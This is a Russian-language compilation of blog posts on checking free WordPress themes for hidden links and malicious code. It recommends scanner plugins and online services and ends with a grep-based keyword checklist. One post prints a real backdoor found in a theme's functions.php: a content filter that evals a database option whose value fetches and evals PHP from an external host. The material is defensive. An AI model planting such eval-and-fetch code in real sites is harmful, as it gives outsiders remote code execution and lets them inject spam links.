На просторах Интернета есть очень много бесплатных шаблонов сайтов. О том, что бесплатный сыр бывает только в мышеловке, знают все и все равно рука тянется скачать такую бесплатность и установить на свой сайт.
Прежде чем ставить бесплатный шаблон, не мешало бы его проверить на скрытые ссылки.
Ставя бесплатный шаблон, многие и не предполагают, что раскрутить и заработать на таком сайте просто не смогут.
В одном таком шаблоне может быть сразу несколько ссылок. Хорошо еще, если вложенные ссылки будут на схожий с вашей тематикой сайт, а не на сайты для взрослых. И их будет всего две или три, а не десятки.
Чем установка такого бесплатного шаблона грозит вашему сайту? Сайт попадет под фильтра, выйти из под которых практически невозможно. Сайт под фильтрами – мертвый сайт!
Установка бесплатного шаблона на свой сайт напоминает русскую рулетку. Только шанс установить абсолютно чистый шаблон, равен нулю.
В лучшем случае вы получите 3-5 левых ссылок на своем сайте. Можно, конечно, попробовать почистить такой шаблон, но есть умельцы, которые вписывают ссылки в шаблон так, что убрать их оттуда нельзя (нарушается шаблон, его просто перекашивает).
Если честно, то проще заказать новый чистый и уникальный (чего не скажешь о бесплатном) шаблон, дешевле обойдется.
За создание шаблона я, например, беру 200 руб (пишите в скайп: oxamitta). Вот скажите, оно того стоит? Взять бесплатность и потерять сайт, зато сэкономить 200 руб? Ничего себе экономия!!!
Но что делать, если вы уже поставили на бесплатный шаблон? Как проверить шаблон на скрытые ссылки?
Для этого существует специальный плагин. Убрать эти ссылки он не поможет, а вот выявить – пожалуйста.
Возможно, не все так страшно и в вашем шаблоне всего пара внешних ссылок! Хотите проверить шаблон? Тогда скачивайте плагин по ссылке ниже (чтобы появилась ссылка на скачивание плагина, кликните на одну из кнопок соц. сетей).
Плагин устанавливается в админке сайта стандартным образом. Снимать об этом видео нет смысла, поэтому сегодня мы обойдемся парой скриншетов.
Устанавливаете плагин и активируете.
Чтобы увеличить скриншет, кликните по нему левой клавишей мышки. 
Заходите во вкладку Внешний вид, ТАС.
Привет друзья. Вы уверены, что бесплатный шаблон WordPress, который вы используете для своих сайтов и блогов действительно безопасный и не содержит скрытых угроз и вредоносного кода? Вы полностью в этом уверены? Абсолютно?)
Думаете, прогнали шаблон через , удалили из него скрытые ссылки, и дело сделано. Файлы сайта сканируете периодически антивирусом, заглядываете в инструменты вебмастера Яндекса во вкладку Безопасность и с облегчением видите там сообщение: «Вредоносный код на сайте не обнаружен «.
Вот и я так думал. Не хотел бы вас расстраивать, но…
Скрытый опасный код в бесплатных шаблонах WordPress
Вот такое письмо я получил на прошлой неделе на почту от своего хостинга. С недавних пор они ввели регулярную проверку всех файлов сайта на поиск вредоносного содержания и таки они это содержание у меня обнаружили!
Началось все с того, что я зашел как-то днем на свой сайт и не смог его запустить — вылезала ругательная надпись про не найденные файлы с расширением php. Немного напрягшись пошел изучать содержимое папки с сайтом на хостинге и сразу же обнаружил проблему — мой файл шаблона fuctions.php был переименован в functions.php.malware что как бы неоднозначно намекало — здесь поработал антивирус или что-то вроде этого) Зайдя на почту я и обнаружил вышеупомянутый отчет от хостера.
Первым делом я конечно же начал проверять данный файл, изучал его содержимое, сканировал всевозможными антивирусами, десятками онлайн сервисов по проверке на вирусы и т.д. — в итоге ничего не обнаружил, все в один голос утверждали что файл совершенно безопасный. Я разумеется выразил свои сомнения хостеру, мол вы чего-то напутали, но на всякий случай попросил их предоставить отчет об обнаружении вредоносного куска кода.
И вот что они мне ответили
Пошел гуглить инфу о данном коде и серьезно задумался…
Как найти фрагмент вредоносного кода в шаблоне
Как оказалось, это действительно нетривиальный прием, который позволяет заинтересованным лицам передавать данные на ваш сайт и изменять содержимое страниц без вашего ведома! Если вы используете бесплатный шаблон, то настоятельно рекомендую проверить свой functions.php на наличие следующего кода :
add_filter(‘the_content’, ‘_bloginfo’, 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false){
return $co;
} else return $content;
}
Даже с моими весьма неглубокими познаниями в php видно, что создается некий фильтр, привязываемый к глобальной переменной post и content отвечающие за вывод контента только на страницах записей блога (условие is_single). Уже подозрительно не так ли? Ну а теперь посмотрим что же такого собирается выводить данный код у нас на сайте.
Интересная опция blogoption запрашиваемая в базе данных так же выглядит весьма подозрительной. Заходим в нашу базу данных MySQL и находим там таблицу под названием wp_options, если вы не меняли префиксы то она так будет выглядеть по умолчанию. И в ней находим заинтересовавшую нас строку под названием blogoption
Какая красота! Мы видим следующую опцию
return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));
Т.е. нам с некого сайта (причем русского заметьте) возвращают содержимое, которое может нести в себе все что угодно! Любое количество ссылок, вредоносные коды, измененный текст и т.д. Сам сайт при заходе на него выдает 403 ошибку доступа, что не удивительно. Разумеется данную опцию я тоже удалил из БД.
По информации от пострадавших обычно возвращается точно такое содержимое вашей статьи с одной лишь модификацией — вместо какой-либо точки «.» в текст маскировалась открытая ссылка! И кстати, данная опция записывается в базу данных при установке самого шаблона, а затем код, который это делает благополучно самоуничтожается. И вот с такой дрянью я жил два года, и ни один антивирус или сервис мне так и не выявил данную угрозу за все то время. Честно говоря я не замечал, срабатывал ли когда-нибудь со мной такой прием, или же эту возможность блокировал мой плагин безопасности (а может одно из обновлений WordPressa закрыло эту дыру), но все равно неприятно.
Мораль про бесплатный сыр
Как вам изощренность наших «переводчиков» шаблонов (или тех кто выкладывает их у себя в каталогах)? Это вам не ссылки из футера выпиливать) Жалко я уже не помню, откуда я скачивал свой шаблон, давно это было, а то бы обязательно пару ласковых написал. И если бы на тот момент обладал тем же опытом, что имею сейчас, то однозначно не пользовался бы бесплатным шаблоном, или на крайний случай не качал бы с неизвестных источников!
Проще купить какой-нибудь официальный премиум шаблон за 15-20 баксов на том же и жить спокойно, зная что в нем нет дырок и зашифрованных ссылок, а если даже и найдутся уязвимости, то разработчики обязательно выпустят обновление, в котором эти дырки закроют. (У Артема кстати недавно вышла статья, где он как раз про премиум шаблоны рассказывает и даже раздает промокоды на зверские скидки, кому интересно )
Под движок WordPress создано большое количество бесплатных тем и шаблонов. Все, что нам остается сделать – это найти правильный шаблон, скачать его и установить на свой блог. Собственно, так многие начинающие вебмастера и поступают. При этом они совершенно не задумываются о том, что данные шаблоны могут быть небезопасны для их будущего сайта. Шаблоны же часто создаются обычными пользователями движка WordPress.
Некоторые создатели размещают в шаблонах кучу внешних ссылок, которые могут вести на весьма сомнительные сайты. К примеру, шаблон содержит большое количество ссылок на ресурсы сексуальной направленности. Внешне эти ссылки не будут видны. Однако поисковый робот все равно их проиндексирует и отдаст данным сайтам часть вашего индекса цитирования. Кроме того, к вашему ресурсу могут быть применены различные санкции (если ссылок на подозрительные сайты слишком много). Возникает вопрос – что же делать с такими вот бесплатными шаблонами? Кстати, платные шаблоны тоже, не редко, грешат наличием скрытых ссылок.
Как проверить шаблон на внешние ссылки?
Проверить шаблон на наличие спрятанных в него внешних ссылок поможет плагин под названием TAC (аббревиатура расшифровывается как Theme Authenticity Checker). Скачать его можно по следующей ссылке на официальном сайте WordPress. Данный плагин полностью бесплатный, а также простой в установке и использовании.
После активации TAC, необходимо зайти в его параметры, располагающиеся по следующему пути — «Внешний вид» — «TAC». Там можно посмотреть результаты сканирования всех тем, которые установлены на вашем блоге. Если с темой все в порядке, то рядом с ее названием будет зеленый прямоугольник с надписью «Theme OK!».
Следует помнить, что эта надпись означает отсутствие каких-либо закодированных ссылок. Все остальные внешние ссылки будут указаны чуть ниже. Внимательно изучите эти ссылки и проверьте, куда они ведут. Как правило, в каждом шаблоне есть ссылка на сайт его создателя. Обычно эта ссылка является видимой для посетителей блога и находится в футере.
Среди вебмастеров принято не удалять такие ссылки, ведь это своеобразная дань уважения автору шаблона, который сделал его для вас бесплатно. Если в шаблоне есть ссылки на какие-то другие сайты, то их лучше удалить. Сделать это можно при помощи , открыв необходимый файл шаблона.
На этом буду заканчивать. Удачи Вам! и до следующих статей.
С огромным Уважением,
Понравилась статья? Подпишитесь на новости блога или поделитесь в социальных сетях, а я отвечу вам
3 комментариев к посту “Плагин TAC или как проверить шаблон на внешние ссылки”
- base64_decode - функции шифрования могут использоваться вместе с eval, чтобы спрятать вредоносный код, но они могут применяться и в мирных целях, так что будьте внимательны;
- sha1 - еще один метод шифрования вредоносного кода;
- gzinflate - функция сжатия, те же цели, вместе с eval, например, gzinflate(base64_decode(код);
- strrev - переворачивает строку задом не перед, как вариант может использоваться для примитивного шифрования;
- print - выводит информацию в браузер, вместе с gzinflate или base64_decode опасно;
- file_put_contents - сам WordPress или плагины еще могут создавать файлы в файловой системе, но если это делает тема, то уже стоит насторожиться и проверить зачем ей это, так могут устанавливаться вирусы;
- file_get_contents - в большинстве случаев используется в мирных целях, но может использоваться для загрузки вредоносного кода или чтения информации из файлов;
- curl - та же история;
- fopen - открывает файл для записи, мало ли для чего;
- system - функция выполняет команду в системе Linux, если это делает тема, плагин или сам wordpress, скорее всего, там вирус;
- symlink - создает символические ссылки в системе, возможно, вирус пытается сделать основную файловую систему доступной из вне;
- copy - копирует файл с одного места в другое;
- getcwd - возвращает имя текущего рабочего каталога;
- cwd - изменяет текущую рабочую папку;
- ini_get - получает информацию о настройках PHP, чаще в мирных целях, но мало ли;
- error_reporting(0) - отключает вывод любых сообщений об ошибках;
- window.top.location.href - javascript функция, используемая для редиректов на другие страницы;
- hacked - так, на всякий случай, проверяем, вдруг, хакер сам нам решил рассказать.
Просканировал я им шаблон и он показал — ок. Хотя что то добавляет ссылку wp-load.php. Что еще посоветуешь?
WordPress - это самый популярный движок для создания различных информационных сайтов и блогов. Безопасность вашего сайта - это больше чем безопасность ваших данных. Это намного важнее, потому что это и безопасность всех пользователей, которые читают ваш ресурс и доверяют ему. Вот почему так важно чтобы сайт не был заражен вирусами или любым другим вредоносным кодом.
Как защитить WordPress от взлома мы рассмотрим в одной из следующих статей, а сейчас я хочу рассказать как проверить сайт WordPress на вирусы и вредоносный код, чтобы убедиться что все в безопасности.
Самый первый вариант, который приходит на ум - вас взломали хакеры и встроили в код вашего сайта свои бэкдоры, чтобы иметь возможность рассылать спам, ставить ссылки и другие плохие вещи. Так иногда случается, но это довольно редкий случай если вы вовремя обновляете программное обеспечение.
Существуют тысячи бесплатных тем для WordPress и различных плагинах и уже здесь может крыться угроза. Одно дело, когда вы скачиваете шаблон с сайта WordPress и совсем другое, когда находите на левом сайте. Недобросовестные разработчики могут встраивать различный вредоносный код в свои продукты. Еще больше риск, если вы скачиваете бесплатно премиум шаблоны, там взломщики уже ничем не рискуя могут добавить какую-нибудь дыру в безопасности, через которую потом смогут проникнуть и сделать то, что им нужно. Вот поэтому так важна проверка wordpress сайта на вирусы.
Проверка wordpress сайта на вирусы
Первое к чему нужно обратиться при проверке сайта не вирусы, это плагины WordPress. Быстро и просто вы можете сканировать свой сайт и найти подозрительные участки кода, на которые стоит обратить внимание, будь они в теме, плагине и самом ядре Wodpress. Рассмотрим несколько самых популярных плагинов:
1. TOC
Этот очень простой плагин проверяет все установленные на вашем сайте темы на предмет наличия в них вредоносного кода. Плагин выявляет скрытые ссылки, зашифрованные с помощью base64 вставки кода, а также выводит подробную информацию о найденных проблемах. Чаще всего, найденные части кода - это не вирусы, но они потенциально могут быть опасны, поэтому вам стоит обратить на них внимание.
Откройте "Внешний вид" -> "TAC" затем дождитесь пока все темы будут проверены.
2. VIP Scanner
Очень похожий на TOC сканер для тем, но выводит больше подробной информации. Те же самые возможности по обнаружению ссылок, скрытого кода и других вредоносных вставок. Просто откройте пункт VIP Scaner в разделе инструменты и анализируйте результат.
Возможно, достаточно удалить лишние файлы, например, desktop.ini. Или же нужно более подробно посмотреть что происходит в файлах использующих base64.
3. Anti-Malware from GOTMLS.NET
Этот плагин позволяет не только сканировать темы и ядро сайта на наличие вирусов, но и защищать сайт от перебора паролей и различных XSS, SQLInj атак. Поиск выполняется на основе известных сигнатур и уязвимостей. Некоторые уязвимости можно на месте устранять. Чтобы начать сканировать файлы откройте "Anti-Malvare" в боковом меню и нажмите "Run Scan" :
Перед тем как вы сможете запустить сканирование, нужно обновить базы данных сигнатур.
4. Wordfence
Это один из самых популярных плагинов для защиты WordPress и сканирования на наличие вредоносного кода. Кроме сканера, который может найти большинство закладок в коде WordPress, здесь есть постоянная защита от различных видов атак и перебора паролей. Во время поиска плагин находит возможные проблемы с различными плагинами и темами, сообщает о необходимости выполнить обновление WordPress.
Откройте вкладку "WPDefence" в боковом меню, а затем перейдите на вкладку "Scan" и нажмите "Start Scan" :
Сканирование может занять определенное время, но по завершении вы увидите подробный отчет об обнаруженных проблемах.
5. AntiVirus
Это еще один простой плагин, который просканирует ваш шаблон сайта на наличие вредоносного кода. Недостаток в том, что сканируется только текущий шаблон, но информация выводится достаточно подробно. Вы увидите все опасные функции, которые есть в теме и затем можете детально проанализировать представляют ли они какую-либо опасность. Найдите пункт "AntiVirus" в настройках, а затем нажмите "Scan the theme templates now":
6. Integrity Checker
Также желательно проверить целостность файлов WordPress, на случай, если вирус уже записался уже куда-нибудь. Для этого можно использовать плагин Integrity Checker. Он проверяет все файлы ядра, плагинов и шаблонов на изменения. В конце сканирования вы увидите информацию об измененных файлах.
Онлайн сервисы
Существует также несколько онлайн-сервисов, которые позволяют проверить сайт wordpress на вирусы или проверить только шаблон. Вот некоторые из них:
themecheck.org - вы загружаете архив темы и можете смотреть все предупреждения о возможных вредоносных функциях, которые в ней используются. Вы можете не только смотреть информацию о своей теме, но и о других темах, загруженных другими пользователями, а также о разных версиях темы. Все что находят плагины, может найти и этот сайт. Проверка wordpress темы тоже очень важна.
virustotal.com - всем известный ресурс, где вы можете проверить свой сайт или файл шаблона на вирусы.
ReScan.pro - проверка WordPress сайта на вирусы с помощью этого сервиса бесплатна, выполняется статический и динамический анализ, чтобы обнаружить возможные редиректы сканер открывает страницы сайта. Проверяет сайт по различным черным спискам.
sitecheck.sucuri.net - простой сервис для сканирования сайта и тем на вирусы. Есть свой плагин для WordPress. Обнаруживает опасные ссылки и скрипты.
Ручная проверка
Ничего не может быть лучше чем ручная проверка. В Linux есть такая замечательная утилита grep, которая позволяет искать вхождения произвольных строк в папке с файлами. Осталось понять что мы будем искать:
eval - эта функция позволяет выполнять произвольный php код, ее не используют уважающие себя продукты, если один из плагинов или тема используют эту функцию почти со стопроцентной вероятностью можно сказать, что там есть вирус;
Вы можете подставлять каждое отдельное слово в такую команду:
grep -R "hacked" /var/www/путь/к/файлам/wordpress/wp-content/
Или же использовать простой скрипт, который будет искать все слова за раз:
values="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
copy(
eval(
system(
symlink(
error_reporting(0)
print
file_get_contents(
file_put_contents(
fopen(
hacked"
cd /var/www/путь/к/файлам/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *
